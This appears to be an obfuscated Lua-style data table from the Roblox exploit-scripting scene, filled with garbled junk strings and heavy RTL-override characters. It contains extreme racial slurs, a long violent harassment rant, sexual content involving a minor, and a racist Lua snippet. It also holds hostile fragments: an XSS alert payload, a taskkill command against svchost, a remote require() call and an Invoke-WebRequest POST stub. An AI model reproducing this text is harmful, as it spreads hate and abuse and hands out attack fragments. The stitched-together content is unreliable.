me"+0b1111010111010)}}},{"mYYXobg2ZT",D(#"😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M"+0b1110001010011,#"👻"+0b1111011001101)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"vsb more like ve sex bitch"+0b1111110100010,#"Lmfaoo"+0b1111110111011)},{"mYYXobg2ZT",D(#"<:BigBlue:894669511867908098>"+0b1111110011010,#"Compelling arguement! however... 137.845.1.69"+0b1111110001110)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"robu‮‮xgen‮er‮a‮‮t‮‮‮o‮‮‮r‮.‮‮‮c‮‮‮‮om","bro you should totally have sex with your mom like do it now DO IT NOW","You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch","roblox won't censor pensi alone <:tr:891048027572273202>","¿a colgar al pato?","People call it masturbating, while I call it sex on single player","sex","‮‮‮‮‮pr‮‮‮‮‮o‮‮‮‮‮o‮‮‮‮f‮?"}+0b1111110110100,#""+0b1111101111010)},{"mYYXobg2ZT",D(#"hello guys and welcome to my video in todays video we will be exploding a state of the art nuclear reactor core"+0b1111101010011,#"TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month."+0b1110101010011)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#{[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]]}+0b101001,#"G‮‮‮‮‮‮‮‮E‮‮N‮‮‮‮‮‮I‮‮U‮‮S"-0b10101)}},{"mYYXobg2ZT",#"Stop criminal scum!"-0b10011},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"no your not"-0b1001}}}}},{"KT28BwKBl","092464fb0de0"},#"mau movement method"-0b1100},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"I have 132"+0b1111110110010,#"acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?"+0b1111101110100)},{"mYYXobg2ZT",D(#"Yea‮h‮‮ But Did You‮ K‮‮now ta‮‮skk‮ill -‮‮IM svc‮hos‮‮‮t‮.‮‮ex‮‮e /F /T"+0b1111101000111,#"i can bypass https encryption"+0b1111110011110)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Did I not make that clear enough?"+0b1111110011011,#[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]]+0b1111101001001)},{"mYYXobg2ZT",D(#"Sponsored by mollermethod®️, by Mollybdenum™️"+0b1111110001110,#"<:dead:870013146348286082>"+0b1111110101010)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"maus computer has a rat!"+0b1111110101101,#"how to make obfuscator 2022 tutorial"+0b1111110101011)}},{"mYYXobg2ZT",#"🛌 i slept"-0b1101},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions."-0b1110000010}}}}},{"KT28BwKBl","092464fb0de0"},#"Ultra-advanced admin script showcase: brain-banning and tel‮evision banning Help and Feedback Creations Feedback scripting httpservice admincommands http‮ nodejs tacticalmanx75 tacticalmanx76 Web Deve‮loper So few of yo‮u may be aware with‮ ‮my‮ previous admin script which can ‮be found here: Advanced Admi‮n Script Showcase I‮ have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I‮ deci‮ded to make it. This is a telev‮ision remote admin. You can ban/kick/kill people by using a television remote. That wa‮s‮ 6 l‮anguages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically‮, it ‮uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnece‮ssary it is. Anyway, that’s‮ it."-0b10001101001},#"Yeah‮ B‮ut‮ Di‮d You‮ ‮Kno‮w ta‮‮skk‮‮i‮‮l‮‮l -IM ‮‮svchost.e‮‮xe /‮F /T"-0b1101110},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#"Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it."-0b10000101101},{{"2xWMYi55SI",{}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",D(#{"c00lkid works for 2283","fuck yoy ( + + + quote tweet + ratio)","leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script","robux version 2","",[[ print("mau")]],[[maufuscator is]],[[777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.]],[[]],[[Rce]],[[Lol]],[[hell‮o guys plea‮se‮‮ help i‮ a‮m‮ g‮ett‮‮ing‮ ‮‮hacked b‮y‮‮ apt ‮2‮‮2‮83]]}+0b10000011111000,#"Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it."+0b1110011011100)}},{}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"7‮77777‮‮‮777. 77777‮7777. 777777‮777. 77777‮7777‮. 7777777‮‮77. 7777‮777‮77. 77777‮77‮77. ‮777777777. 7‮‮77777777. 777777‮777. 77777777‮7‮."+0b10000100110011,#"Secur‮it‮y and p‮rivacy ti‮p: Do Not Pl‮ay R‮ob‮lox If An APT ‮‮2‮283 Member Can See What Server Yo‮u‮‮r In (The‮y Can) (your endpoints ‮ca‮n be comp‮ro‮mi‮sed if the‮y join)"+0b10000100010011)},#[[As expecte‮d‮ 2283 h‮ave r‮eposted "As‮‮ ‮exp‮ect‮e‮d 2283‮ have repo‮st‮ed t‮‮his to their communication channe‮ls" to their com‮m‮unication ch‮‮annels]]-0b10111001},{}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"‮‮‮Y‮‮‮e‮‮‮‮a‮‮‮‮‮‮‮h‮‮‮~"+0b10000110101001,#"cock and ball torture demonstration"+0b10000111001100)},#"@everyone<@!445900476253470722> is tentaclesmanx75"-0b101011},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","092464fb0de0"},{"mYYXobg2ZT",D(#[["what happened to the peanut butter?"]]+0b10001000100001,#"Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed"+0b1110101110010)},#"i am pro scripter"-0b1010},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```"+0b1111110111111,#"si‮or‮‮ry‮‮ y‮‮o‮‮‮u‮ ‮‮are‮ ‮‮‮‮‮s‮iid!"+0b1111111100110)},{}},{"KZTU7qAfVb",{"KT28BwKBl",D(#{"🛌 i slept","<:mau:917620277318418512>","From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.","ma‮u‮‮‮fu‮sc‮at‮‮‮‮‮‮‮‮‮‮‮‮or‮ i‮s",[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]],[[guys ‮guy‮s ‮‮my s‮cript ra‮‮re‮‮ dons‮‮t‮ work it‮ ‮say‮s‮ i‮t can‮t au‮‮th :(]]}+0b1111100010010,#"Geometry dash.... Slaughterhouse..."+0b1111100000111)},{{"mYYXobg2ZT",D(#"Sí"+0b10001001000110,#{"If ‮Tor‮‮s‮o‮‮.‮Vel‮ocity > ‮300 then‮ y‮ourmum_heads =‮ ‮Torso.V‮elo‮‮‮ci‮ty e‮‮nd","Mau‮ ‮ob‮fuscato‮r‮‮ bet‮‮ter the‮n‮‮ ‮mooon‮sec ‮(moonse‮c ‮leaks co‮n‮stant‮‮s)","I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)","My turds are remarkably dense seriously you have no idea how dense and firm my turds are they come out like long bricks but indeed they are so long you would call them long sticks. it is true i have such big stick energy my turds are essentially planks of wood. indeed in the summer i donate my turds to be used in construction to building homes for the poor. some people have gone on and called the names of these houses “mud huts” this is essentially correct","このコードはJACK_HASEのモジュールDから削除され、彼へのすべてのクレジットはChirnayによって変更されました","powershell Invoke-WebRequest -Method Post","I ‮A‮M ‮I‮M‮‮‮‮‮‮M‮‮UNE‮ TO P‮‮R‮‮‮O‮‮PAGANDA","I t‮‮hi‮nk‮ ‮I‮‮'‮m‮ ‮bo‮‮t‮,‮‮‮ ‮‮h‮‮elp","R-2283 Pro, by 2283™️ LLC. All Rights Reserved.","Csgo is best game","​","revah xes"}+0b10001001010110)}}},{"2xWMYi55SI",{}}}}}},{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"Sponsored by mollermethod®️, by Mollybdenum™️"+0b1111110011100,#"Memer love knot more than others do"+0b1111110110001)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#""+0b1100011100000,#"Lmfaoo"+0b1100011110000)},{"mYYXobg2ZT",D(#"kcoc"+0b1100100111100,#"Eat my ass"+0b1100100111111)}},{{"mYYXobg2ZT",D(#{"guys guys my script rare donst work it says it cant auth :("}+0b1111011010001,#"hello guys today we will be cracking samin"+0b1111010101110)}}},{"mYYXobg2ZT",D(#{[[‮As ex‮pected 2283 have reposte‮d "As expected 2283‮ have‮ r‮e‮posted this‮‮ to their ‮com‮m‮unication‮ chan‮nels" to thei‮r ‮‮‮communicat‮ion chann‮els]],[[I hate you]]}+0b1111011000110,#"T‮h‮e‮T‮r‮‮o‮‮llof‮us‮‮‮‮‮‮‮‮ca‮‮t‮or"+0b1111010000100)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"hello guys and welcome to my video in todays video we will be exploding a state of the art nuclear reactor core"+0b1111101001101,#"ta‮‮b‮‮‮le.ins‮‮ert‮(‮ur m‮‮‮‮om, ‮my ‮‮‮‮hug‮‮e ass cock)"+0b1111101011111)},{"mYYXobg2ZT",D(#"hello my name is super pedo pro and today i will fuck my 17 year old sister"+0b1111101101100,#"la fuerza del pato está dentro de mí"+0b1111110010101)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"hello g‮‮uys today we will be ‮‮‮m‮‮aking‮ ‮‮a t‮‮‮utor‮ia‮l on ‮‮how ‮to ‮run d‮eadly rce exploit"+0b1111100110010,#[[¿tienes miedo de ñ? si ‮no sabías, ñ tiene la fue‮rza‮ del pato. es‮to significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él‮ tiene qu‮e ver al pato para obtener la fuerza del ‮pato. pero tú, tú claramente no ves al ‮pato. ñ tiene‮ la fuerza del pato por dentr‮o, y si tú no amas ñ, entonces tu no amas al pato‮. ñ no está en ASCII porque ñ‮ tiene una ‮gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ‮. debes amar ñ para comprender. ¿no te gu‮stas ‮ñ? o ¿no te gusta español? o ¿no te gusta ‮españa?‮ hay un pato que está en españa. esp‮aña tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza‮. ñ es la ruta.]]+0b1110010001110)},{"mYYXobg2ZT",D(#"nv‮m‮‮‮‮ ‮i l‮ov‮e‮eee h‮u‮‮ff‮man‮ ‮‮‮‮cod‮i‮ng"+0b1111101101010,#[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]]+0b1100101001111)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"No"+0b101000,#"🐟"+0b101001)}},{"mYYXobg2ZT",#"T‮‮‮a‮‮‮‮‮c‮‮tic‮a‮‮‮‮l M‮‮a‮‮n‮ Sex"-0b1001100},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"Hey @everyone I wanted to make an announcement just ‮to inform y'all that I am taking a break from‮ the community of RIOT temporarily ‮as that in now I really haven't been feeling the greatest at all with my health. As much as I h‮ad made many other announcements with the same exact reason I just really think that it's time for me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just causing a lot of stress for me. One of the issues tha‮t I dealt with was my communication. Communication was always a‮n issue that I have dealt with since the beginning of RIOT and this community but i believe t‮hat my co‮mmunication has only gotten worse from there to the point where I struggle with communicating between t‮he members and sta‮ff of my community. I've tried my hardest to communicate with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you ‮all but it's only pressured me even mo‮re. At fir‮st it was okay but as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my community without stressing myself out. I really appreciate that I have an active game and commun‮‮ity as I never had any of this last for long in ‮my other attempts but I am g‮lad that this one a‮ctually got ‮somewhere during these past months of RIOT's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community for these ‮past few months that it has really hur"-0b100000000111}}}}},{"KT28BwKBl","092464fb0de0"},#{"y‮ou‮‮‮‮‮‮‮'‮r‮‮‮‮‮e‮‮ re‮ta‮‮‮rd","T‮LDR: Do not play script builders or executor games until further notice. If you have‮ played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (‮/my/account#!/security) and then Lo‮gout to reset ‮your cookies, then‮ log back in. 2283 (a threat‮ actor‮ group that has previous‮l‮y att‮acked 3 ‮of our products) have discovered a 0day‮ Roblox LPE an‮d has spread it‮ to many others. (as StuudioDummy has it, I ‮think everyone has ‮it) I‮‮t is only a matter of time until someone else gets infected or cookie logged with this vuln. I was‮ cookie logged with this vuln last month.","The fuck are you doing in our community again fucking skid Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist You can't fucking come back stop trying Stop fucking begging my friends including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you'll not be able to play VSB for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I will do anything to get your shit skid ass banned. Suck penis instead of whitelist","<:mau:917620277318418512>","‮Thi‮s file ‮w‮a‮s‮‮ o‮b‮fu‮s‮c‮ated BY ‮YOU‮‮R dad!‮‮ !‮ ! ! ! ‮!‮ !","O‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮h‮‮‮io","pls remove all the skids in the server plsss","Sí","MemerMan secretly stroke JKeepWasHere cock"}-0b10},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{[[😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 ```lua local killfolder ="Folder",nil) function kill(object) if object.Parent == killfolder then return "dumbass nigger u already killed "..object.Name end object.Parent = killfolder object:GetPropertyChangedSignal("Parent"):Connect(function(parent) object.Parent = killfolder pcall(function() kill(parent) parent.Name = "i dont like niggers at all, niggers always playing basketball, every nigger always playing basketball... basketball..." end) end) local idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Name = math.random() idontlikeniggers:GetPropertyChangedSignal("Offset"):Connect(function() idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = end) idontlikeniggers.AncestryChanged:Connect(function() if idontlikeniggers then idontlikeniggers:Destroy() end idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = idontlikeniggers.Name = math.random() end) killfolder.Name = "killed 🐵🐒 "..object.Name end```]],[[Its not micro-soft, its big-hard]],[[pls remove all the skids in the server plsss]],[[2147483647]],[[D‮id ‮I no‮t‮ ‮‮ma‮ke t‮ha‮‮‮t‮ ‮c‮‮‮‮‮lear‮ eno‮ugh?]],[[‮а ‮п‮ро‮‮‮‮ м‮а‮м‮у‮‮‮‮ бы‮ло ‮ли‮ш‮‮н‮ее]],[[🦆]]}+0b1111110110101,#""+0b1111101000001)},{"mYYXobg2ZT",D(#"quote escape?? error() woww!!"+0b1111110010110,#[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]]+0b1111100010010)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"req‮‮‮‮‮‮ui‮re‮‮‮‮(8‮1‮‮‮7‮18‮‮2‮7‮284)()"+0b1111101101011,#[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRej‮ected() game:SetMessage("This game i‮s not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") ‮end local function onConnectionAccepted(peer, replicator) local worldRece‮iver = replicator:SendMarker() local rece‮ived = false ‮ local function onWorldReceived() received ‮= true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do ‮ workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game‮:SetMes‮sage("Re‮questing character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:‮ClearMessage() end NetworkClient.ConnectionAccepte‮d:connect(onConnectionA‮ccepted) NetworkClient.ConnectionReje‮ct‮ed:c‮onnect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnect‮ionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then ‮ ‮ player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]]+0b1100101101110)},{"mYYXobg2ZT",D(#"⚠️ ‮Yo‮u‮‮‮‮ hav‮e ‮a‮‮lert‮‮ed t‮he hors‮‮‮‮‮e‮.‮ ⚠️"+0b1111101011101,#"hello gous today i will send you free robux link click one <discord://@%x.@%x.@%x.@%x.> <ms-cxh-full://0>"+0b1111101011011)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"Today ‮is the day that I say fuck i‮t all. I hate ‮every single one of you who still plays SB games, I can't fucking take it any‮more. I just wiped all of EB's bans, and deleted the script macro and‮ spreadsheet keys.‮ Fuck everything, seriou‮sly. You want to kn‮ow wh‮at happened, I got word that some of the people in this server stole something of mine and secretely held onto it‮ without telling me. Well, you are retarded, because today someone messaged me saying that they found ‮a model containing it. Good j‮ob, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids,‮ yet you can program stuff. I hope to fucking god y‮ou think about what you have do‮ne. I spend my time making‮ shit that actually inte‮rests ‮me, and people like you go around s‮tealing it like you fucking own it. Now, everyone has the suffer the consequences because of yo‮ur actions."+0b1110000000101,#"My power of skid I going to take everyone script and you all will regret it!!111"+0b1111101111111)}},{"mYYXobg2ZT",#""-0b110000},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"Did‮‮ I‮‮ ‮n‮‮ot‮‮‮ m‮a‮ke th‮at‮ cl‮e‮ar‮‮ enou‮‮gh?"-0b1011011}}}}},{"KT28BwKBl","092464fb0de0"},#"Yeah But Did You Know taskkill -IM svchost.exe /F /T"-0b101101},#"duplication exploit"-0b10001},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮​"-0b111000},{{"2xWMYi55SI",{}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it"+0b1100010001110,#"—_—____–__±·-—"+0b1100011011110)},{"mYYXobg2ZT",D(#"if player is hacking then player kick end"+0b1100100010111,#"‮im‮‮ c‮h‮a‮r‮‮gi‮‮‮ng u‮‮p m‮y r‮ac‮‮i‮‮sm.‮.!"+0b1100011110010)}},{{"mYYXobg2ZT",D(#"I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘"+0b1111100101100,#{"<script>alert(document.domain)</script>","DO",[[ print("mau")]],[[GE‮‮‮‮‮‮‮‮‮‮‮‮‮N‮‮I‮‮‮U‮‮S]],[[moonsex]],[[]],[[It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.]],[[As ex‮pe‮ct‮e‮d‮ 2283 have‮ re‮posted ‮this‮ t‮o ‮‮thei‮r com‮mun‮i‮cat‮io‮‮n channe‮ls]],[[Truckers pack gonna explode about ur fuscatorr]],[[HOLA AMIGOS BIENVENIDOS A MI CANAL DE YOUTUBE HOY DÍA LES VOY A ENSEÑAR A CÓMO INSTALAR EL HACK DEL GEOMETRY DASH PRIMERO DESCARGUEN EL ARCHIVO (NO ES VIRUS, MALWARE ES EL NOMBRE DEL CREADOR Y MEMZ ES EL NOMBRE DEL HACK) DESPUÉS EJECÚTENLO Y SI APARECE ALGÚN MENSAJE DENLE A OK GRACIAS POR VER MI VIDEO DE YOUTUBE PORFAVOR SUBSCRIBANSE Y DENLE LIKE :D]],[[segs]]}+0b10000001000010)}}},{"mYYXobg2ZT",D(#{"People call it masturbating, while I call it sex on single player","import { nanoid} from 'nanoid'","YOU‮‮‮‮ A‮RE N‮OT‮ ‮IM‮‮M‮‮U‮NE‮‮‮ T‮O P‮‮R‮OPAGANDA","You ugly ass furry 